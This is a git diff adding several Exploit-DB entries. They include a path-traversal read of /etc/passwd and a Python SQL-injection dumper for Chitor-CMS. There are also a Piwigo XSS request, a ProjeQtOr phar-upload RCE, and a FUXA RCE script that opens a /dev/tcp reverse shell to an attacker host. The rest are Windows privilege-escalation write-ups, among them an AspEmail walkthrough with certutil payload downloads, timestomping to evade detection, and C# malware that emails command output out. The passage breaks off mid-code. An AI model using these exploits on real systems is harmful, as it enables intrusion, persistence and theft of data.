+# curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+ntp:x:104:110::/nonexistent:/usr/sbin/nologin
+messagebus:x:105:111::/nonexistent:/usr/sbin/nologin
+uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
+pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
+lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
+hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
+systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+vboxadd:x:998:1::/var/run/vboxadd:/bin/false
+openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
+sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
+mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false
+
+
+### References:
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179
+https://nvd.nist.gov/vuln/detail/CVE-2023-27179
+https://www.exploit-db.com/papers/12883
\ No newline at end of file
diff --git a/exploits/php/webapps/51383.py b/exploits/php/webapps/51383.py
new file mode 100755
index 000000000..db85fcdfe
--- /dev/null
+++ b/exploits/php/webapps/51383.py
@@ -0,0 +1,164 @@
+#!/usr/bin/python3
+
+#######################################################
+# #
+# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection #
+# Date: 2023/04/13 #
+# ExploitAuthor: msd0pe #
+# Project: https://github.com/waqaskanju/Chitor-CMS #
+# My Github: https://github.com/msd0pe-1 #
+# Patched the 2023/04/16: 69d3442 commit #
+# #
+#######################################################
+
+__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
+__author__ = 'msd0pe'
+__version__ = '1.1'
+__date__ = '2023/04/13'
+
+class bcolors:
+ PURPLE = '\033[95m'
+ BLUE = '\033[94m'
+ GREEN = '\033[92m'
+ OCRA = '\033[93m'
+ RED = '\033[91m'
+ CYAN = '\033[96m'
+ ENDC = '\033[0m'
+ BOLD = '\033[1m'
+ UNDERLINE = '\033[4m'
+
+class infos:
+ INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
+ ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
+ GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
+ PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "
+
+import re
+import requests
+import optparse
+from prettytable import PrettyTable
+
+def DumpTable(url, database, table):
+ header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
+ x = PrettyTable()
+ columns = []
+ payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
+ u = requests.get(url + payload, headers=header)
+ try:
+ r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
+ r = r[0].replace('\"',"").split(',')
+ if r == []:
+ pass
+ else:
+ for i in r:
+ columns.append(i)
+ pass
+ except:
+ pass
+ x.field_names = columns
+ payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
+ u = requests.get(url + payload, headers=header)
+ try:
+ r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
+ r = r[0].replace('\"',"").split(',')
+ if r == []:
+ pass
+ else:
+ for i in r:
+ i = i.split("xzmdpl")
+ x.add_rows([i])
+ except ValueError:
+ r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
+ r = r[0].replace('\"',"").split(',')
+ if r == []:
+ pass
+ else:
+ for i in r:
+ i = i.split("xzmdpl")
+ i.append("")
+ x.add_rows([i])
+ print(x)
+
+def ListTables(url, database):
+ header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
+ x = PrettyTable()
+ x.field_names = ["TABLES"]
+ payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
+ u = requests.get(url + payload, headers=header)
+ try:
+ r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
+ r = r[0].replace('\"',"").split(',')
+ if r == []:
+ pass
+ else:
+ for i in r:
+ x.add_row([i])
+ except:
+ pass
+ print(x)
+
+def ListDatabases(url):
+ header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
+ x = PrettyTable()
+ x.field_names = ["DATABASES"]
+ payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
+ u = requests.get(url + payload, headers=header)
+ try:
+ r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
+ r = r[0].replace('\"',"").split(',')
+ if r == []:
+ pass
+ else:
+ for i in r:
+ x.add_row([i])
+ except:
+ pass
+ print(x)
+
+def Main():
+ Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
+ Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
+ Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
+ Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
+ Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
+ Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
+ Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
+ (options, args) = Menu.parse_args()
+
+ Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
+ python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
+ python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+ """)
+ Menu.add_option_group(Examples)
+
+ if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
+ Menu.print_help()
+ print('')
+ print(' %s' % __description__)
+ print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
+ print(' Any malicious or illegal activity may be punishable by law')
+ print(' Use at your own risk')
+
+ elif len(args) == 0:
+ try:
+ if options.url != None:
+ if options.l_databases != None:
+ ListDatabases(options.url)
+ if options.database != None:
+ if options.l_tables != None:
+ ListTables(options.url, options.database)
+ if options.table != None:
+ if options.dump != None:
+ DumpTable(options.url, options.database, options.table)
+ except:
+ print("Unexpected error")
+
+if __name__ == '__main__':
+ try:
+ Main()
+
+ except KeyboardInterrupt:
+ print()
+ print(infos.PROCESS + "Exiting...")
+ print()
+ exit(1)
\ No newline at end of file
diff --git a/exploits/php/webapps/51386.txt b/exploits/php/webapps/51386.txt
new file mode 100644
index 000000000..09b51e6cd
--- /dev/null
+++ b/exploits/php/webapps/51386.txt
@@ -0,0 +1,43 @@
+Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)
+Application: Piwigo
+Version: 13.6.0
+Bugs: Stored XSS
+Technology: PHP
+Vendor URL: https://piwigo.org/
+Software Link: https://piwigo.org/get-piwigo
+Date of found: 18.04.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+steps:
+
+1.After uploading the image, we write instead of the tag(keyword) while editing the image)
+payload:
+
+
+POST /piwigo/admin.php?page=photo-9 HTTP/1.1
+Host: localhost
+Content-Length: 159
+Cache-Control: max-age=0
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/piwigo/admin.php?page=photo-9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe
+Connection: close
+
+name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings
\ No newline at end of file
diff --git a/exploits/php/webapps/51387.txt b/exploits/php/webapps/51387.txt
new file mode 100644
index 000000000..5f78e3c3e
--- /dev/null
+++ b/exploits/php/webapps/51387.txt
@@ -0,0 +1,89 @@
+Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE)
+Application: ProjeQtOr Project Management System
+Version: 10.3.2
+Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
+Technology: PHP
+Vendor URL: https://www.projeqtor.org
+Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download
+Date of found: 19.04.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+Possible including php file with phar extension while uploading image. Rce is triggered when we visit again
+
+Payload:
+
+poc request:
+
+
+POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1
+Host: localhost
+Content-Length: 1177
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+Accept: application/json
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+sec-ch-ua-platform: "Linux"
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/projeqtor/view/main.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic
+Connection: close
+
+------WebKitFormBoundaryY0bpJaQzcvQberWR
+Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"
+Content-Type: application/octet-stream
+
+
+
+------WebKitFormBoundaryY0bpJaQzcvQberWR
+Content-Disposition: form-data; name="attachmentId"
+
+
+------WebKitFormBoundaryY0bpJaQzcvQberWR
+Content-Disposition: form-data; name="attachmentRefType"
+
+User
+------WebKitFormBoundaryY0bpJaQzcvQberWR
+Content-Disposition: form-data; name="attachmentRefId"
+
+1
+------WebKitFormBoundaryY0bpJaQzcvQberWR
+Content-Disposition: form-data; name="attachmentType"
+
+file
+------WebKitFormBoundaryY0bpJaQzcvQberWR
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+10485760
+------WebKitFormBoundaryY0bpJaQzcvQberWR
+Content-Disposition: form-data; name="attachmentLink"
+
+
+------WebKitFormBoundaryY0bpJaQzcvQberWR
+Content-Disposition: form-data; name="attachmentDescription"
+
+
+------WebKitFormBoundaryY0bpJaQzcvQberWR
+Content-Disposition: form-data; name="attachmentPrivacy"
+
+1
+------WebKitFormBoundaryY0bpJaQzcvQberWR
+Content-Disposition: form-data; name="uploadType"
+
+html5
+------WebKitFormBoundaryY0bpJaQzcvQberWR--
+
+
+
+
+visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar
\ No newline at end of file
diff --git a/exploits/typescript/webapps/51385.txt b/exploits/typescript/webapps/51385.txt
new file mode 100644
index 000000000..7227c873f
--- /dev/null
+++ b/exploits/typescript/webapps/51385.txt
@@ -0,0 +1,45 @@
+# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE)
+# Date: 18/04/2023
+# Exploit Author: Rodolfo Mariano
+# Vendor Homepage: https://github.com/frangoteam/FUXA
+# Version: FUXA V.1.1.13-1186 (current)
+
+from argparse import RawTextHelpFormatter
+import argparse, sys, threading, requests
+
+def main(rhost, rport, lhost, lport):
+ url = "http://"+rhost+":"+rport+"/api/runscript"
+ payload = {
+ "headers":
+ {
+ "normalizedNames":{},
+ "lazyUpdate": "null"
+ },
+ "params":{
+ "script":{
+ "parameters":[
+ {
+ "name":"ok",
+ "type":"tagid",
+ "value":""
+ }
+ ],
+ "mode":"",
+ "id":"",
+ "test":"true",
+ "name":"ok",
+ "outputId":"",
+ "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport)
+ }
+ }
+ }
+ response = requests.post(url, json=payload)
+args = None
+parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts --rport --lport ")
+parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost')
+parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881)
+parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost')
+parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport')
+
+args=parser.parse_args()
+main(args.rhost, args.rport, args.lhost, args.lport)
\ No newline at end of file
diff --git a/exploits/windows/local/51375.txt b/exploits/windows/local/51375.txt
new file mode 100644
index 000000000..7f94f36bb
--- /dev/null
+++ b/exploits/windows/local/51375.txt
@@ -0,0 +1,38 @@
+# Exploit Title: File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control
+# Date: 2023-04-13
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: http://www.diasoft.net - https://www.filereplicationpro.com
+# Software Link: http://www.filereplicationpro.com/install/InstData/Windows_64_Bit/VM/frpro.exe
+# Version: 7.5.0
+# Tested on: Windows 10 Pro 22H2 x64
+# CVE: CVE-2023-26918
+
+Incorrect file/folder permissions in Diasoft Corporation's File Replication Pro 7.5.0 allow privilege escalation by
+replacing a file with another one that will be executed with "LocalSystem" rights from Windows Services application.
+
+C:\Program Files>icacls "c:\Program Files\FileReplicationPro"
+c:\Program Files\FileReplicationPro Everyone:(F)
+ Everyone:(OI)(CI)(IO)(F)
+
+C:\Users\Administrator>sc qc frp
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+
+NOME_SERVIZIO: frp
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_AVVIO : 2 AUTO_START
+ CONTROLLO_ERRORE : 1 NORMAL
+ NOME_PERCORSO_BINARIO : "C:\Program Files\FileReplicationPro\prunsrv.exe" //RS//frp
+ GRUPPO_ORDINE_CARICAMENTO :
+ TAG : 0
+ NOME_VISUALIZZATO : FRPReplicationServer
+ DIPENDENZE : Tcpip
+ : Afd
+ SERVICE_START_NAME : LocalSystem
+
+To exploit the vulnerability a malicious actor/process must weaponize or replace the prunsrv.exe executable that runs
+with LocalSystem privileges as "frp" (FRPReplicationServer) service, since the application's path has "Everyone" full
+access permissions.
+
+Moreover, the "properties.xml" file in the "etc" folder inside program's path contains the hashed password for remote
+access stored in sha1(base64) value, that is possible to modify. Replacing it with a new hash, generated by encrypting
+a string in SHA-1 and encoding its digest via base64, will grant the login access on the application's web interface.
\ No newline at end of file
diff --git a/exploits/windows/local/51380.txt b/exploits/windows/local/51380.txt
new file mode 100644
index 000000000..cf4bed842
--- /dev/null
+++ b/exploits/windows/local/51380.txt
@@ -0,0 +1,372 @@
+####################################################################################################################
+# Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation #
+# Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] #
+# Date: 13/04/2023 #
+# Exploit Author: Zer0FauLT [admindeepsec@proton.me] #
+# Vendor Homepage: https://www.aspemail.com #
+# Software Link: https://www.aspemail.com/download.html #
+# Product: AspEmail #
+# Version: AspEmail 5.6.0.2 and all #
+# Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU #
+# Tested on: Windows Server 2016 and Windows Server 2019 #
+# CVE : 0DAY #
+####################################################################################################################
+
+# ==================================================================================================================
+
+[+] C:\PenTest>whoami /priv
+
+ PRIVILEGES INFORMATION
+ ----------------------
+
+ Privilege Name Description State
+ ============================= ========================================= ========
+ SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
+ SeChangeNotifyPrivilege Bypass traverse checking Enabled
+ SeImpersonatePrivilege Impersonate a client after authentication Enabled
+ SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
+
+# ==================================================================================================================
+
+* First, we will test whether the AspEmail service is active.
+* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:
+
+[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
+ EmailAgent.exe 4400 Persits Software EmailAgent
+
+ or
+
+[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
+ EmailAgent64.exe 4400 Persits Software EmailAgent
+
+* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING".
+* Now we know that AspEmail service is active.
+
+# ==================================================================================================================
+
+* We will need these:
+
+[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
+[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
+[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
+[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
+[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
+
+# ==================================================================================================================
+
+[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
+
+ Name: Persits Software EmailAgent
+ ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
+ Agent.exe" /run
+ User : LocalSystem
+ ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN
+ IdentityReference : Everyone
+ Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
+ AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
+ ReadExtendedAttributes, DeleteChild, Execute/Traverse
+ Status : Unknown
+ UserCanStart : False
+ UserCanStop : False
+
+[+] C:\PenTest>del PrivescCheck.ps1
+
+* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.
+
+# ================================================================================================================== #
+
+[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
+
+ Successfully processed 0 files; Failed processing 1 files
+ C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
+
+* We do not have permission to access subdirectories.
+
+# ==================================================================================================================
+
+[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
+
+ C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
+ DeepSecLab\psacln:(I)(OI)(CI)(N)
+ DeepSecLab\psaadm:(I)(OI)(CI)(N)
+ DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
+ BUILTIN\Administrators:(I)(F)
+ CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
+ NT SERVICE\TrustedInstaller:(I)(CI)(F)
+ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
+ BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Users:(I)(OI)(CI)(RX)
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
+
+* Unlike other directories, we have full privileges in the "BIN" directory of the service.
+* This is chmod 0777 - rwxrwxrwx in linux language.
+
+# ==================================================================================================================
+
+[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
+
+ __PATH
+
+ \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
+
+ \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
+ root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16
+ [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
+
+* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.
+
+# ==================================================================================================================
+
+* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.
+
+[+] C:\PenTest>whoami
+ DeepSecLab\Hacker
+
+[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
+ SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
+
+[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
+
+ processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
+ Successfully processed 1 files; Failed processing 0 files
+
+* Ok. All commands resulted successfully. We now have full privileges for this directory.
+
+# ==================================================================================================================
+
+* Now we will modify the EmailAgent file and inject a self-written malware.
+* We will be careful not to damage any files while doing this so that all transactions can be easily undone.
+
+[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
+[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
+
+# ==================================================================================================================
+
+[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 0C8A-5291
+
+ Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
+
+ 14.04.2023 16:47 .
+ 14.04.2023 16:47 ..
+ 01.03.2004 15:55 143.360 AspEmail.dll
+ 25.02.2004 16:23 188.416 AspUpload.dll
+ 13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
+ 24.09.2003 09:22 139.264 EmailAgentCfg.cpl
+ 24.09.2003 09:25 94.208 EmailLogger.dll
+ 24.09.2003 09:21 167.936 Null.EmailAgent.exe
+ 6 File(s) 745.472 bytes
+ 2 Dir(s) 165.936.717.824 bytes free
+
+# ==================================================================================================================
+
+* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.
+
+[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
+[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
+
+* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
+* I used the Resource Tuner Console tool.
+>>> http://www.restuner.com/tour-resource-tuner-console.htm
+* This can be done easily with the Resource Tuner tool.
+>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
+>>> http://www.restuner.com/download.htm
+
+# ==================================================================================================================
+
+[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 0C8A-5291
+
+ Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
+
+ 14.04.2023 16:47 .
+ 14.04.2023 16:47 ..
+ 01.03.2004 15:55 143.360 AspEmail.dll
+ 25.02.2004 16:23 188.416 AspUpload.dll
+ 24.09.2003 09:21 12.288 EmailAgent.exe
+ 24.09.2003 09:22 139.264 EmailAgentCfg.cpl
+ 24.09.2003 09:25 94.208 EmailLogger.dll
+ 24.09.2003 09:21 167.936 Null.EmailAgent.exe
+ 6 File(s) 745.472 bytes
+ 2 Dir(s) 165.936.717.824 bytes free
+
+ [24.09.2003 09:21] 12.288 EmailAgent.exe
+ [24.09.2003 09:21] 167.936 Null.EmailAgent.exe
+
+* And time manipulation is over. They look like they were uploaded at the same time long ago.
+
+# ==================================================================================================================
+
+* Now we check for my malware ownership.
+
+[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
+
+ __PATH
+
+ \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
+
+ \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28
+
+[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
+
+ Name
+
+ DeepSecLab\Hacker
+
+ EmailAgent.exe Owner: DeepSecLab\Hacker
+
+# =================================================================================================================#
+# #
+####################################################################################################################
+# #[EmailAgent.cs]# #
+####################################################################################################################
+# #
+ #
+* We program this malware in such a way that when the server is reboot(when the services are restarted), #
+* It will be triggered and execute the codes we want, #
+* And then send a printout of all this to the email address we specified. #
+ #
+ using System; #
+ using System.Linq; #
+ using System.Text; #
+ using System.Diagnostics; #
+ using System.IO; #
+ using System.Collections; #
+ #
+ Namespace CliToolSpace #
+ { #
+ class _Main #
+ { #
+ static void Main(string[] args) #
+ { #
+ Cli commandLine = new Cli(); #
+ commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #
+ commandLine.Execute(); #
+ commandLine.ToFile(@"C:\Windows\Temp\"); #
+ } #
+ } #
+ } #
+ #
+# #
+####################################################################################################################
+# #[Mail.cs]# #
+####################################################################################################################
+# #
+ #
+ using System; #
+ using System.Net.Mail; #
+ using System.Net; #
+ SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #
+ var mail = new MailMessage(); #
+ mail.From = new MailAddress("mail@deepseclab.com"); #
